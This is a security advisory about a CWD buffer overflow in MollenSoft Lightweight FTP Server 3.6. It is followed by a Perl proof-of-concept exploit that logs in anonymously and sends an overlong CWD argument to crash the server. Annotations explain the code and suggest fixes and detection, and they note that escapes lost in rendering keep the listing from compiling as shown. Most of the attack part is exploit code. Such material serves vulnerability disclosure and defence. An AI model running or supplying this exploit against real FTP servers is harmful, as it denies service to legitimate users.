source: http://www.securityfocus.com/bid/10409/info
A denial of service condition is reported to exist in the MollenSoft Lightweight FTP Server that may allow a remote user to deny service to legitimate FTP users. The vulnerability is due to a lack of sufficient boundary checks performed on CWD command arguments.
It should be noted that although this vulnerability is reported to affect MollenSoft Lightweight FTP Server version 3.6, other versions might also be affected.
#!/usr/bin/perl
#
# Mollensoft FTP Server CMD Buffer Overflow
#
# Orkut users? Come join the SecuriTeam community
# http://www.orkut.com/Community.aspx?cmm=44441
use strict;
use IO::Socket::INET;
# Driver for the proof-of-concept described in the advisory text above: it
# connects to an FTP service, logs in, and sends a single CWD command whose
# argument is far longer than a normal directory name -- the input the
# advisory says the server does not bounds-check.
# NOTE(review): as rendered on this page the string literals have lost their
# backslash escapes, so "$usernamern" and "$passwordrn" parse as undeclared
# variables and the listing does not compile under `use strict` as shown.
# Defender's view: the fix belongs in the server (check the CWD argument
# length before copying it); a CWD argument hundreds of bytes long is also a
# simple condition to alert on at an FTP proxy or IDS.

# Exactly two positional arguments are required; usage() exits otherwise.
usage() unless (@ARGV == 2);
# Host and port are taken from the command line without further validation.
my $host = shift(@ARGV);
my $port = shift(@ARGV);
# create the socket
# NOTE(review): IO::Socket::INET documents this option as `Proto`; confirm
# the lowercase key is honoured (TCP is the module's default either way).
my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host,
PeerPort=>$port);
# new() returns undef when the connection cannot be made.
$socket or die "Cannot connect to host!n";
# Flush every write immediately so each command goes out as it is printed.
$socket->autoflush(1);
# receive greeting
# Read lines until one contains "220 " (recv_reply's stop pattern), then
# echo everything that was read to stdout.
my $repcode = "220 ";
my $response = recv_reply($socket, $repcode);
print $response;
# send USER command
#my $username = "%00" x 2041;
my $username = "anonymous";
# Each command is echoed to stdout, then written to the socket.
print "USER $usernamern";
print $socket "USER $usernamern";
# The server's reply to USER is not read; the script only pauses briefly.
select(undef, undef, undef, 0.002); # sleep of 2 milliseconds
# send PASS command
# NOTE(review): "[email protected]" looks like the hosting site's e-mail
# obfuscation placeholder rather than the author's original value.
my $password = "[email protected]";
print "PASS $passwordrn";
print $socket "PASS $passwordrn";
# Build the CWD command: the verb followed by 224 repeated "A" characters.
my $cmd = "CWD ";
$cmd .= "A" x 224; # Value can range from 224 to 1018
$cmd .= "rn";
# Report the total command length before sending it.
print "length: ".length($cmd)."n";
print $socket $cmd;
# Read whatever the server sends back, if anything; the result is discarded.
$repcode = "";
recv_reply($socket, $repcode);
close($socket);
exit(0);
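sub usage
{
    # Print the command-line synopsis to stdout and exit with status 1.
    # Takes no arguments and never returns.
    #
    # The message previously contained literal "n" characters where newline
    # escapes were intended, and named a different FTP product than the one
    # this script is written for; both are corrected here.
    print "\nUsage: Mollensoft_FTP_Server_crash.pl <host> <port>\n\n",
          "<host> - The host to connect to\n",
          "<port> - The TCP port which the FTP server is listening on\n\n";
    exit(1);
}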
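sub recv_reply
{
    # Read lines from a handle until one matches the expected reply code.
    #
    # Parameters:
    #   $socket  - readable handle (the connected FTP control socket)
    #   $repcode - pattern that marks the last line to read, e.g. "220 ";
    #              undef or "" means "return after the first line received"
    # Returns:
    #   Every line read so far, concatenated, including the matching line.
    #   If the stream ends before a match, whatever was read is returned.
    # Dies:
    #   When called without a handle.
    my $socket  = shift;
    my $repcode = shift;
    $socket or die "Can't receive on socket\n";

    # An empty pattern must be handled explicitly: Perl treats // as "reuse
    # the last successfully matched regex", so an empty $repcode would
    # silently keep looking for a previous call's reply code instead of
    # accepting any reply.
    my $accept_any = !defined($repcode) || $repcode eq '';

    my $res = "";
    # A lexical line variable keeps the caller's $_ untouched.
    while (defined(my $line = <$socket>)) {
        $res .= $line;
        last if $accept_any || $line =~ /$repcode/;
    }
    return $res;
}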